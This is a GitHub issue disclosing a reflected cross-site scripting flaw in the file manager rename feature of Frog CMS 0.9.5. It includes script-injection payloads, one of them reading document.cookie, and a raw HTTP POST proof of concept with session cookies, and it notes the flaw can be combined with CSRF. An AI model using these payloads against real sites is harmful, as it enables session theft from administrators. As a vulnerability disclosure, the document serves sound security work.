Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Frog CMS 0.9.5 has a reflected Cross Site Scripting Vulnerability #10

Open
Black-l opened this issue May 7, 2018 · 0 comments
Open

Comments

@Black-l
Copy link

Black-l commented May 7, 2018

I have found a reflected Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1:8888/FrogCMS1/admin/?/plugin/file_manager
In the document management office, create new directory test1:
Files-->test1
payload:"/><script>alert(9527)</script>
Modify the directory test1 name,adding a payload at the directory causes directory errors to trigger cross-site scripting。

i think you can see the following picture to konw more.

qq 20180507011218

qq 20180507011816

POC:
POST /FrogCMS1/admin/?/plugin/file_manager/rename HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FrogCMS1/admin/?/plugin/file_manager
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Cookie: PHPSESSID=131iv8tkh2ddt13m5vm7dd9sd7; frog_auth_user=exp%3D1526631381%26id%3D1%26digest%3Dca43be6ff340d03eaa08eeee29a77658
Connection: close
Upgrade-Insecure-Requests: 1

file%5Bcurrent_name%5D=test1"/><script>alert(9527)</script>&file%5Bnew_name%5D=test1&commit=Rename

qq 20180507011922

qq 20180507011938

qq 20180507104628

payload:"/><script>alert(document.cookie)</script>
Can be used in conjunction with csrf.

Affected Version:
0.9.5

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant